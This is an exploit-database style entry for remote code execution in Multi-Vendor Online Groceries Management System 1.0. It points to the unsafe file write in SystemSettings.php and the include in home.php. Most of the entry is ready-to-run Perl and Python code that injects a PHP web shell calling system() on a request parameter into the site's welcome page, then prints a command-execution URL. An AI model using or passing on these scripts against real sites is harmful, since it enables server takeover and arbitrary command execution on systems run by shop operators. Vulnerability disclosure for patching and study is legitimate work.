Multi-Vendor Online Groceries Management System 1.0 Remote Code Execution

# Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution (RCE)# Date: 4/23/2023# Author: Or4nG.M4n# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html# Version: 1.0# Tested on: windows## Vuln File : SystemSettings.php < here you can inject php code#     if(isset($_POST['content'])){#      foreach($_POST['content'] as $k => $v)#      file_put_contents("../{$k}.html",$v); <=== put any code into welcome.html or whatever you want#    }# Vuln File : home.php < here you can include and execute you're php code#                   <h3 class="text-center">Welcome</h3>#                   <hr>#                   <div class="welcome-content">#                       <?php include("welcome.html") ?> <=== include #                   </div># Perl Code use LWP::UserAgent;use LWP::Simple;print "Target Url #";my $url = <STDIN>;chomp $url;$backdoor = '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'; my $ua       = LWP::UserAgent->new();my $response = $ua->post( $url."/classes/SystemSettings.php?f=update_settings", { 'content[welcome]' => $backdoor } );my $content  = $response->decoded_content();print "[+] injection in welcome page\n";print "[+] backdoor url ".$url."/?cmd=ls -al";# Python Codeimport requests url = input("Enter url :")postdata = {'content[welcome]':'<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'}resp = requests.post(url+"/classes/SystemSettings.php?f=update_settings", postdata)print("[+] injection in welcome page")print("[+]"+url+"/?cmd=ls -al")print("\n")